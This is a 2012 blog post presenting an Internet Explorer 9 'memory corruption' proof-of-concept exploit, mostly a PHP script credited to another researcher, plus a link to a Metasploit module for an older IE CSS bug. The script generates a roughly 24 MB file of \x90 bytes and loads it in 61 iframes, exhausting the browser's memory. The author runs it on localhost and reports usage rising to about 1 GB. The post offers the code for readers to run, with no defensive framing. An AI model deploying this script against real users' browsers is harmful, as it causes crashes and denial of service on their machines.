Saturday, 3 November 2012

IE9 Memory Corruption Attack

Ajith KP November 03, 2012 2 comments :

Internet Explorer is vulnerable to many attacks. Memory corruption vulnerability have found many times in Internet Explorer. Before this, CSS based memory corruption found in Internet Explorer.

Metasploit Module for CSS memory corruption attack: http://www.metasploit.com/modules/exploit/windows/browser/ms11_003_ie_css_import [IE 6,7,8]

Here I would like to introduce IE9 's memory corruption attack.

Save the bellow PHP code:

<?php

/**********************************************************
 *   Internet Explorer 9 Memory Corruption PoC Exploit    *
 **********************************************************
 *                                                        *
 * Successfully executed with IE9 version 9.0.8112.16421  *
 *                                                        *
 * Discovered by Jean Pascal Pereira <pereira@secbiz.de>  *
 *                                                        *
 **********************************************************/

set_time_limit(0);

ini_set('memory_limit', '300M');

if(!file_exists("junk.htm"))
{
  $string = "<span id='";
  
  for($i = 0; $i < 24117256; $i++)
  {
    $string .= "\x90";
  }
  $string .= "'></span>";
  
  file_put_contents("junk.htm", $string);
}

print "View the sourcecode of the iframe below (right click -> view source): <br />\n";
print "<iframe style='width: 800px; height: 500px;' src='junk.htm'>\n";

for($i = 0; $i < 60; $i++)
{
  print "<iframe style='display:none' src='junk.htm'>\n";
}

/* http://0xffe4.org */

Save it as any name you like, but extension must be php. Open it in your Internet Explorer.

I opened IE9 browser. Memory usage is only 25,862K.

Now I opened the PHP file saved in my LOCALHOST. 30 Seconds after opened PHP file in my browser. OMG 1,016,240K memory usage :o

----------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------

<-------------------------------------------------Hope You Like This Post--------------------------------------------->
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Hope Your Comments<<<<<<<<<<<<<<<<<<<<<<<<<<<
------------------------------------------------->Share With Your Friends<----------------------------------------------